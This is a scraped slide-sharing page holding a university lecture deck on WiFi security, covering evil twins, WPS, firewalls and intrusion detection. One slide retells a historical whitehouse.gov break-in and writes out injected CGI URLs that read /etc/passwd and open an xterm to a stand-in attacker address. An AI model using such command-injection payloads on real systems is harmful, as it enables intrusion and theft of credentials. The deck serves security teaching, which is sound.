wif ifi security
play

WiF iFi security UW Madison CS 642 1 Announcements HW 3 (network - PowerPoint PPT Presentation

Aug 01, 2023 •896 likes •1.19k views

WiF iFi security UW Madison CS 642 1 Announcements HW 3 (network security) out today Due April 2 nd Online classes going forward Testing out BBCollaborate Ultra today Recordings should be available Might use different

  1. WiF iFi security UW Madison CS 642 1

  2. Announcements • HW 3 (network security) out today • Due April 2 nd • Online classes going forward • Testing out BBCollaborate Ultra today • Recordings should be available • Might use different tech the next time we meet • Mar 24: Midterm discussion • Anonymity lecture

  3. AP = Access point Security of WiFi networks STA = station BSS = basic service set DS = distribution service ESS = extended service set • 802.11 • SSID (service set identifier) identifies the 802.11 network • BSSID – MAC address of the AP Ad-hoc Infrastructure mode UW Madison CS 642 3 http://technet.microsoft.com/en-us/library/cc757419(WS.10).aspx

  4. 802.11 Images from http://technet.microsoft.com/en-us/library/cc757419(WS.10).aspx UW Madison CS 642 4

  5. … Shiite fighters in Iraq used software programs such as SkyGrabber -- available for as little as $25.95 on the Internet -- to regularly capture drone video feeds, according to a person familiar with reports on the matter. https://www.wsj.com/articles/SB126102247889095011 Interesting report on drone usage by US: https://www-cdn.law.stanford.edu/wp- content/uploads/2015/07/Stanford-NYU- Living-Under-Drones.pdf UW Madison CS 642 5

  6. 802.11 security issues AP Wired versus wireless (announced) Images from http://technet.microsoft.com/en-us/library/cc757419(WS.10).aspx Wireless can (try to) compensate via cryptography - WEP → epic failure - WPA → better, but not great - WPA2 → better yet, but not perfect - WPS → still issues with MITM UW Madison CS 642 6

  7. aircrack-ng http://www.aircrack-ng.org/img/aircrack-ng_movie_1.png UW Madison CS 642 7

  8. 802.11 security issues: WPA-Personal WPA-personal - Pre-shared key (PSK) mode AP - Passwords – user generated or default set - User types in a password to gain access http://en.wikipedia.org/wiki/Linksys_WRT54G_series UW Madison CS 642 8

  9. 802.11 security issues: WPA-Enterprise WPA-enterprise AP - Extended Authentication Protocol (EAP) - Centralized Authentication, Authorization,and Accounting (AAA) 1) Authenticate users/devices before granting access to network 2) Authorize users/devices to access certain network services 3) Account for usage of services Many security issues identified RADIUS authentication server - MSCHAPv2: complexity of breaking (Remote Authentication Dial In User Service) keys reduces to single DES key Client-server protocol over UDP - Errors in certification common name checking - Downgrade attacks UW Madison CS 642 9

  10. WPA 802.11 association AP Probe request SSID: “ linksys ”, BSSID: MAC1 Auth request MAC1 Auth response Evil twin Associate request MAC1 Associate response 10 UW Madison CS 642

  11. WPA with multiple APs Two APs for same network Probe request MAC1 AP MAC2 SSID: “ linksys ”, BSSID: MAC1 SSID: “ linksys ”, BSSID: MAC2 Choose one of MAC1, MAC2 Auth request MAC2 Evil twin Basic idea: … Attacker pretends to be an AP to intercept traffic or collect data UW Madison CS 642 11

  12. 802.11 evil twins Basic attack: Rogue AP Probe request MAC1 AP MAC2 SSID: “ linksys ”, BSSID: MAC1 SSID: “ linksys ”, BSSID: MAC2 Choose one of MAC1, MAC2 Auth request MAC2 Evil twin … Basic idea: Attacker pretends to be an AP to intercept traffic or collect data UW Madison CS 642 12

  13. 802.11 evil twins Evil twin: spoof MAC1 Probe request MAC1 AP MAC2 SSID: “ linksys ”, BSSID: MAC1 SSID: “ linksys ”, BSSID: MAC1 Choose one of MAC1, MAC2 Auth request MAC2 Evil twin … Attacker can send forged disassociate message to victim to get it to look for new connection Conceptually similar to ARP poisoning Victim might send out probe requests for particular SSIDs, giving attacker info UW Madison CS 642 13

  14. WiFi Protected Setup (WPS) • Problems with WPA-personal: • Require Passwords! • New devices lack keypads • WPS – Authenticate if you have physical access • PIN • Push Button • Push the button to start Diffie-Hellman key exchange - Authentication via PIN - Attacker can trick the client into joining their AP • Near field communication (NFC) • Problems • Not hard to guess the PIN (2011 Viehock’s attack recovers PIN in few hours) • Need physical access to the AP • Easy to MITM UW Madison CS 642 14

  15. Push-button configuration (PBC) AP PBC probe PBC probe PBC probe Push button Push button PBC response Diffie-Hellman Key exchange shared secret shared secret UW Madison CS 642 15

  16. Push-button configuration (PBC) PBC probe PBC probe Push button PBC response Push button PBC response Diffie-Hellman Diffie-Hellman Key exchange Key exchange shared shared secret 2 secret 1 shared secret 1 shared secret 2 But this is on wireless, so all messages are seen by all parties Attacker can jam messages, overpower legitimate messages UW Madison CS 642 16

  17. Can we prevent MitM? Gollakota et al., Secure In-Band Wireless Pairing, Security 2011 Basic observations: - Assume all parties in range of each other (all honest broadcasts seen) - Signals cannot be negated - Jamming can be made detectable Tamper-evident Announcement: Synchronization: long random data to make overpowering detectable Payload: key exchange data (public key, etc.) On-Off slots: Encode cryptographic hash of payload in a manipulation-detectable way Intractable to find two payloads such that Hash(payload1) = Hash(payload2) UW Madison CS 642 17

  18. Discussion • What attacks aren’t prevented? • PBC relies on what physical assumptions? • How easy are such jamming based attacks? UW Madison CS 642 19

  19. Defenses - Firewall - IDS - Network monitoring UW Madison CS 642 20

  20. Firewall A s/w or h/w that filters inbound and outbound n/w traffic based on some rules UW Madison CS 642 21

  21. Zyklon Whitehouse Hack [From “The Art of Intrusion”] • Whitehouse.gov ran a program called PHF • It is a form-based interface that takes name as input and looks up address on server (phone book) • PHF sanitizes input using “ escape_shell_cmd ”, but escaping was incomplete. Missed the newline char (0x0a) • Zyklon typed: • http://www.whitehouse.gov/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd • Firewall allowed outbound connections: • http://www.whitehouse.gov/cgi-bin/phf?Qalias=x%0a/usr/X11R6/bin/xterm%20-ut%20- display%20attackers.ip.address:0.0 • The firewall blocked incoming x-server requests, but outbound was okay! • Exploited buffer overflow in ufsrestore => Root on whitehouse.gov! UW Madison CS 642 22

  22. Types of firewall: based on placement Private local network Public network / Internet https://ipwithease.com/network-based-firewall-vs-host-based-firewall/ UW Madison CS 642 23

  23. Types of Firewall: based on functionality 1. (Static) Packet-filtering firewall ( Operates in n/w and transport layer ) • Filter based on TCP/IP header, stateless • srcIP, dstIP, srcPort, dstPort, protocol, etc. 2. Proxy firewall ( a.k.a, Application gateways, Web application firewall (WAF) ) • Have a proxy computer to analyze the packet before letting it in 3. Circuit-level gateways • SOCK proxy 4. Stateful packet inspection (SPI) ( a.k.a, dynamic packet filtering ) UW Madison CS 642 24

  24. Problems with Firewall • Interfere w/ networked applications • Don’t solve many real problem • Buggy software (e.g. Buffer overflow) • Bad protocols (e.g., WEP in 802.11b) • Generally don’t prevent denial of service • Don’t prevent insider attacks • Increasing complexity and potential for misconfiguration UW Madison CS 642 26

  25. Intrusion Detection System (IDS) Intrusion Prevention System (IPS) • Sits inside a firewall. Relatively slow and complex. Main job is to raise alert about a possible intrusion • Many types 1. Network IDS, 2. Host-based IDS, 3. Perimeter IDS, 4. VM IDS • Detection based on 1. Statistical anomaly 2. Attack signature UW Madison CS 642 27

  26. Deficiencies of Network IDS (NIDS) • Insertion, Evasion, and DoS – Ptacek and Newsham paper • Insertion • Insert packets into IDS, that no body cares, and thereby change it’s view of the n/w • Evasion • Again IDS mistakenly rejects a packet that is accepted by other computers • Attack evaded IDS • Hard to replicate the same state as end-systems in the IDS • DoS ed • IDS is a computer, can be DoSed, and often they are failopen UW Madison CS 642 28

  27. NMAP: Network Mapper Trinity hacks into the datacenter in Matrix reloaded using NMAP https://nmap.org/movies/ UW Madison CS 642 29

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

What is network security? Friends and enemies: Alice, Bob, Trudy What is network security?

What is network security? Friends and enemies: Alice, Bob, Trudy What is network security?

Network security Network security Foundations: what is security? cryptography Network Security Network Security authentication message integrity key distribution and certification Security in practice: Srinidhi Varadarajan

332 views • 6 slides
Security Security as term, Possible Security violations Authentication Criteria for

Security Security as term, Possible Security violations Authentication Criteria for

BS1 WS19/20 topic-based slides Security Security as term, Possible Security violations Authentication Criteria for Trust in Computer Systems Three hearts of Windows Security DACLs A Look at Security System is secure if

988 views • 20 slides
CPSC410/611: Security Security Security Attacks Security Threats Crypto

CPSC410/611: Security Security Security Attacks Security Threats Crypto

CPSC 410 / 611 : Operating Systems CPSC410/611: Security Security Security Attacks Security Threats Crypto Authentication Examples SSL Security Threats Breach of confidentiality unauthorized access to

458 views • 18 slides
Biometrics and Security Biometrics and Security Biometrics and Security Biometrics and Security

Biometrics and Security Biometrics and Security Biometrics and Security Biometrics and Security

Biometrics and Security Biometrics and Security Biometrics and Security Biometrics and Security WS 06/07 Seminar Prof. Dr.-Ing. Jana Dittmann & Dr.-Ing. Claus Vielhauer with support from Tobias Scheidat

419 views • 16 slides
1 X.800 Security Services X.800 Security Services X.800 Security Services Data integrity

1 X.800 Security Services X.800 Security Services X.800 Security Services Data integrity

Course Overview Course Requirements EECS 498-7/8 Cryptography and Network Security: www.citi.umich.edu/u/honey/security Principles and Practice (Third Edition) Computer Security Monday & Friday, 9:00 10:30 William Stallings

670 views • 19 slides
A (re)introduction to Spring Security Agenda Before Spring Security: Acegi security

A (re)introduction to Spring Security Agenda Before Spring Security: Acegi security

A (re)introduction to Spring Security Agenda Before Spring Security: Acegi security Introducing Spring Security View layer security Whats coming in Spring Security 3 E-mail: craig@habuma.com Blog: http://www.springloaded.info

452 views • 19 slides
Network Security Network Security Srinidhi Varadarajan Network security Network security

Network Security Network Security Srinidhi Varadarajan Network security Network security

Network Security Network Security Srinidhi Varadarajan Network security Network security Foundations: what is security? cryptography authentication message integrity key distribution and certification Security in practice:

634 views • 36 slides
Security Overview Security Goals The Attack Space Security Mechanisms

Security Overview Security Goals The Attack Space Security Mechanisms

CSCE Intro to Computer Systems Security Security Overview Security Goals The Attack Space Security Mechanisms Introduction to Cryptography Authentication Authorization Confidentiality Case Studies Security

472 views • 20 slides
SECURITY TESTING Towards a safer web world AGENDA 1. 3 WS OF SECURITY TESTING 2. SECURITY

SECURITY TESTING Towards a safer web world AGENDA 1. 3 WS OF SECURITY TESTING 2. SECURITY

SECURITY TESTING Towards a safer web world AGENDA 1. 3 WS OF SECURITY TESTING 2. SECURITY TESTING CONCEPTS 3. SECURITY TESTING TYPES 4. TOP 10 SECURITY RISKS Few Security Breaches Date: 2013-14 September 2016, while in negotiations to

404 views • 18 slides
Security Security with Distributed Systems Why Security? The need for security mechanisms in

Security Security with Distributed Systems Why Security? The need for security mechanisms in

Security Security with Distributed Systems Why Security? The need for security mechanisms in distributed systems arises from the desire to share resources Resources must be protected against unauthorized access, as enemies (attackers)

1.16k views • 67 slides
Security Overview Security Goals The Attack Space Security Mechanisms

Security Overview Security Goals The Attack Space Security Mechanisms

CPSC 410/611 Operating Systems Security Security Overview Security Goals The Attack Space Security Mechanisms Introduction to Cryptography Authentication Authorization Confidentiality Case Studies

419 views • 19 slides
International and Global Security 1 Peer Discussion What is security? 2 International

International and Global Security 1 Peer Discussion What is security? 2 International

International and Global Security 1 Peer Discussion What is security? 2 International Security What is security? Freedom from threats to core values? Contestation over referent object: Individual? State? System? How is security achieved?

715 views • 11 slides
Security 101 Definition of Information Security Information security is the protection of

Security 101 Definition of Information Security Information security is the protection of

Computing Services Information Security Office Security 101 Definition of Information Security Information security is the protection of information and systems from unauthorized access, disclosure, modification, destruction or disruption. The

469 views • 22 slides
Security Update Security Plans Our Security plans are For Official Use Only, Safety

Security Update Security Plans Our Security plans are For Official Use Only, Safety

Security Update Security Plans Our Security plans are For Official Use Only, Safety Sensitive Information Not for public or media release F.S. 119.071. Required by law, rule and regulation: Homeland Security Directive 5 and 8.

393 views • 11 slides
Com puter Security Part One Security as a subject Security is an old problem in the

Com puter Security Part One Security as a subject Security is an old problem in the

Com puter Security Part One Security as a subject Security is an old problem in the computing world, and are parallel to even older problems outside computing Required level of security is always related to what you protect

237 views • 23 slides
Introduction to Security Comm. Security Strategy Summary ITS335: IT Security Sirindhorn

Introduction to Security Comm. Security Strategy Summary ITS335: IT Security Sirindhorn

ITS335 Intro. to Security Concepts Threats, Attacks, Assets Introduction to Security Comm. Security Strategy Summary ITS335: IT Security Sirindhorn International Institute of Technology Thammasat University Prepared by Steven Gordon on 2

965 views • 34 slides
Introduction to Network Security Chapter 5 Physical Network Layer Dr. Doug Jacobson -

Introduction to Network Security Chapter 5 Physical Network Layer Dr. Doug Jacobson -

Introduction to Network Security Chapter 5 Physical Network Layer Dr. Doug Jacobson - Introduction to 1 Network Security - 2009 Topics Lower Layer Security Physical Layer Overview Common attack methods Ethernet

1.01k views • 80 slides
Some Security Notes on Notes on Cisco Enterprise WLAN Solutions WLAN Solutions Daniel Mende,

Some Security Notes on Notes on Cisco Enterprise WLAN Solutions WLAN Solutions Daniel Mende,

Some Security Notes on Notes on Cisco Enterprise WLAN Solutions WLAN Solutions Daniel Mende, Enno Rey Rey {dmende, oroeschke, erey}@ernw.de Who we are Old-school network geeks, working as security researchers for Germany based

832 views • 42 slides
http://guysiwouldnevereverfuck.tumblr.com/ ROFL Tech =! Technology ? Why only certain

http://guysiwouldnevereverfuck.tumblr.com/ ROFL Tech =! Technology ? Why only certain

http://guysiwouldnevereverfuck.tumblr.com/ ROFL Tech =! Technology ? Why only certain technologies are called tech? Tech has become its own thing, even though information Technology is only one type of technology. Infocentrism +

593 views • 28 slides
NSAC Subcommittee Report Implementing the 2007 Long Range Plan Robert E. Tribble Texas A&M

NSAC Subcommittee Report Implementing the 2007 Long Range Plan Robert E. Tribble Texas A&M

NSAC Subcommittee Report Implementing the 2007 Long Range Plan Robert E. Tribble Texas A&M University January 28, 2013 The Budget Problem Report Appendix to the subcommittee Charge from NSAC Report Appendix Subcommittee Membership

805 views • 56 slides
Fusing Beliefs of Multi-Layer Metrics for Detecting Security Attacks Konstantinos Kyriakopoulos

Fusing Beliefs of Multi-Layer Metrics for Detecting Security Attacks Konstantinos Kyriakopoulos

Fusing Beliefs of Multi-Layer Metrics for Detecting Security Attacks Konstantinos Kyriakopoulos Francisco J. Aparicio Navarro David Parish Coseners House - July 2011 Wednesday, 6 July 2011 Overview Introduction Aims Metrics -

242 views • 20 slides
SVT DAQ 2019 Physics Run Cameron Bravo (SLAC) Introduction SVT DAQ system underwent a major

SVT DAQ 2019 Physics Run Cameron Bravo (SLAC) Introduction SVT DAQ system underwent a major

SVT DAQ 2019 Physics Run Cameron Bravo (SLAC) Introduction SVT DAQ system underwent a major overhaul before the run FEB bootloader image Rogue framework TI interface on PCIE cards in SVT DAQ blades (clonfarm 2 and 3)

530 views • 10 slides
Conducting Defensive Information Warfare on Open Platforms 23rd October 2013 LinuxCon Europe

Conducting Defensive Information Warfare on Open Platforms 23rd October 2013 LinuxCon Europe

Conducting Defensive Information Warfare on Open Platforms 23rd October 2013 LinuxCon Europe Ben Tullis (formerly of) LinuxIT (Europe) Ltd. Ben Tullis - Background Professional Linux sysadmin (etc.) for 12+ years Worked in

883 views • 59 slides
Building Scalable Wireless Networks Network Startup Resource Center ATI-4 Campus Wireless

Building Scalable Wireless Networks Network Startup Resource Center ATI-4 Campus Wireless

Building Scalable Wireless Networks Network Startup Resource Center ATI-4 Campus Wireless Networking www.nsrc.org These materials are licensed under the Creative Commons Attribution-NonCommercial 4.0 International license Text

1.27k views • 28 slides

More recommend